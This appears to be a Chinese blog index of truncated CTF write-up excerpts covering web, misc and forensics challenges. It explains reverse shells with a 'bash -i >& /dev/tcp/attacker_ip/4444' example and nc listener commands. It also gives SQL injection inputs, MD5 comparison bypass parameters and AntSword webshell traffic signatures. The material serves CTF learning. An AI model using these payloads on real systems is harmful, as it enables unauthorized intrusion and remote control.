[b01lers 2020]Scarambled一道很有意思的题。
网页调用了一个youtube的视频。
观察到cookie中有两个特别的值frequency和 tranmissions每一次点击网页中reload 发现frequency会增加1,tranmissions中被kxkxkxkxsh包裹的中间部分也会发生变化。
假如把kxkxkxkxsh部分忽略掉,剩下的部分分成三部分:1(红箭头)2(黄箭头)3(黄线)
记录下来一些数据,我们会发现
数据中第三部分代表数据第二部分的位置,第一部分代表它存在于第二部分的前一个位置。
比如说frequency22中: 第三部分20代表4在第二十个位置,那么-在第19个位置,刚好与frequency10对应。甚至可以看到frequency25中显示CT,像是CTF的一部分,猜测完全拼接后会得到flag。发现尝试编写脚本,刷新页面不断获取transmissions中变化的数据,按照规律把他们拼接起来应该能得到flag。
脚本:
123456789101112131415161718192021222324252627282930313233 ...
[陇剑杯 2021]简单日志分析(问3)
先解释一下什么是反弹shell,
“反弹 shell”(reverse shell)是渗透测试和网络安全中非常核心的概念之一。 简单说:它是一种让被控主机主动连接攻击者主机,从而获得交互式命令行控制权的方式。
在正常情况(正向 shell)下,是攻击者主动连接目标,比如:
1nc target_ip 4444
这是“我去找你”。
而反弹 shell 是相反的方向:被攻击的机器主动“反弹”一个连接回攻击者。 换句话说:“你来找我”。
例如,攻击者在自己的电脑上监听:
1nc -lvnp 4444
然后让目标主机执行:
1bash -i >& /dev/tcp/attacker_ip/4444 0>&1
此时目标主机会主动连到攻击者的监听端口,攻击者就获得了一个 shell。
查看一下日志,有三段base64编码字符串,依次解码
很明显第三段是在反弹shell。
misc
未读[SWPU 2020]套娃下载好的附件打不开,不过因为xlsx本来就是压缩包的一种,我们直接修改改后缀打开。
得到两个文件
RCE4data.txt的文件内容是:
1U2FsdGVkX19uI2lzmxYrQ9mc16y7la7qc7VTS8gLaUKa49gzXPclxRXVsRJxWz/p
根据文件名来看应该是RCE4加密的密文,但是我们没有key。
另一个swpu.xls我们还是改成zip,然后打开没显示内容用记事本打开居然显示了密码:
1password:6e4c834d77cba03af41e1562a5bce84e
zip里还有一个加密的压缩包,应该是它的密码,
根据文件名,这应该就是我们要找的key,直接解密
1key:ABCDEFGHIJKLMNOPQRSTUVWXYZ
[SWPUCTF 2022 新生赛]奇妙的MD5题目界面:
比较熟知的字符串一个是0e215962017md5加密后经过弱比较等于自身
一个是ffifdyopMD5 加密后变成万能密码00000000。
提交ffifdyop进入第二关,
查看源代码
需要传入的GET型参数x、ymd5值经php弱比较相同,可以搜索相关字符串比如s1885207154a 和s1836677006a也可以使用数组绕过,
1?x[]=1&y[]=1
然后跳转到下一关
是要进行md5强比较,这里使用数组绕过
[SWPU 2019]伟大的侦探打开附件 misc文件夹需要解压密码,密码.txt里有一串乱码,我们尝试一下用各种编码读,使用010 Editor EBCDIC编码即可发现密码明文。
具体操作为视图->编辑方式->EBCDIC
文件夹解压缩之后可以看到里面的内容
谷歌识图发现是“跳舞的小人”密码,
搜索一下对照表对找得到flag。
[HNCTF 2022 WEEK3]Fun_php1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768697071<?phperror_reporting(0);highlight_file(__FILE__);include "k1y.php";include "fl4g.php";$week_1 = false;$week_2 = false;$getUserID = @$_GET['user']; $getpass = (int)@$_GET['pass']; $getmySaid = @$_GET['mySaid']; $getmyHeart = @$_GET['myHeart']; $data = @$_POST['data'];$v ...
[陇剑杯 2021]webshell(问6)黑客代理工具的回连服务端IP是_____________。
追踪
[^tcp流]: 为什么要追踪TCP流,在网络流量分析中,“追踪 TCP 流”(Follow TCP Stream)能把原本零散的网络数据包还原成一条逻辑上的“会话”,也就是通信双方之间的完整数据交换。TCP 流能揭示攻击手法、命令序列、数据泄露路径。
,在流38中发现一串十六进制代码,
这是
[^蚁剑特征]: 蚁剑的 PHP 端马(默认马)在通信上固定的特征:
特征位置
内容说明
@ini_set("display_errors","0")、@set_time_limit(0)
禁错+不限时,这是几乎所有蚁剑马的开头
asenc() / asoutput()
这是蚁剑默认通信输出函数名,分别对应编码输出与HTTP边界分隔输出,用于分割返回内容
输出包裹符 "28f72" 与 "f48611f4"
这是蚁剑用来标识返回数据边界的随机常量(每个马略有不同,但形态固定)
...
[SUSCTF 2022]Tanner题目描述中提到:There is a special graph which describe one check matrix, find out where is the hint(maybe in the binary data?) and what is the flag.
我们查看到Png文件结束标志[49 45 4E 44 AE 42 60 82]后有信息信息:THE FLAG IS the sha256 of the sum ofthe proper codewords(binary plus)which satisfy the condition.(note: with no zeros front)
意思是flag 是满足条件的所有合法码字(按二进制“加法”求和)的 SHA-256 哈希值。 (注意:结果的二进制数前面不能有多余的 0。)
我们看附件这张图展示的是一种叫 Tanner graph(坦纳图) 的结构,用来表示线性分组码(Linear Block Code)中的校验矩阵(Parity-Check Matrix, H)。 ...
[强网杯 2019]随便注 1【SQL注入】本文章中标题为个步骤涉及到的方法。
SQL查询
第一步,先判断注入点的传参方式,发现是get传参。
在输入框,随便输入1' or 1 = 1,测试一下是否存在sql注入。
提交后提示error 1064 : You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''' at line 1,说明后端参数后面有可能存在其他sql语句,我们在1’ or 1 = 1后面加一个#,将可能存在的其他sql语句注释掉,即:1' or 1 = 1#,成功输出了该表的所有数据,但是没有flag。
首先判断一下字段个数:-1' union select 1,2;#,系统提示return preg_match("/select|update|delete|drop|insert|w ...
php代码之create_function()函数NSS上随机到的一道看题目没什么思路,搜wp看到用到create_function()函数,搜索了解了一下。
create_function()简介适用 PHP4>4.0.1 PHP 5 PHP7
语法:
12345create_function(string $args, string $code)string $args 声明的函数变量部分string $code 执行的方法代码部分
函数功能:
12345<?php$newfunc = create_function('$a,$b', 'return "ln($a) + ln($b) = " . log($a * $b);');echo "New anonymous function: $newfunc\n";echo $newfunc(2, M_E) . "\n";?>
分析:
create_function() 会创造一个匿名函数 (lambd ...
